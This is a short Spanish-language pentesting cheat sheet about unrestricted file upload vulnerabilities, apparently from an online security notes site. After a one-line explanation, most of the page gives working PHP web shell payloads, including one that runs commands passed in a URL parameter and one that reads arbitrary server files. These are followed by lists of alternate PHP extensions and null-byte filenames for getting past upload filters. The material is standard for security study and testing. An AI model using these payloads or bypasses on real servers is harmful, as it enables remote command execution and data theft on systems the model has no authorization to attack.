📂File Upload Inyeccion
Esta vulnerabilidad ocurre cuando un servidor web permite a los usuarios cargar archivos en su sistema sin validar suficientemente cosas como su nombre, tipo, contenido, etc.
Explotación de cargas de archivos sin restricciones para implementar una shell web
<?php echo file_get_contents('/path/to/target/file'); ?><?php echo system($_GET['cmd']); ?><?php echo system('whoami'); ?>Extensiones válidas para PHP
.php
.php3
.php4
.php5
.php7
# Extensiones poco conocidas
.pht
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.inc
# Extensiones con bypass de bit nulo para php
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpgContent-Type
Path Traversal con el nombre del archivo
Última actualización
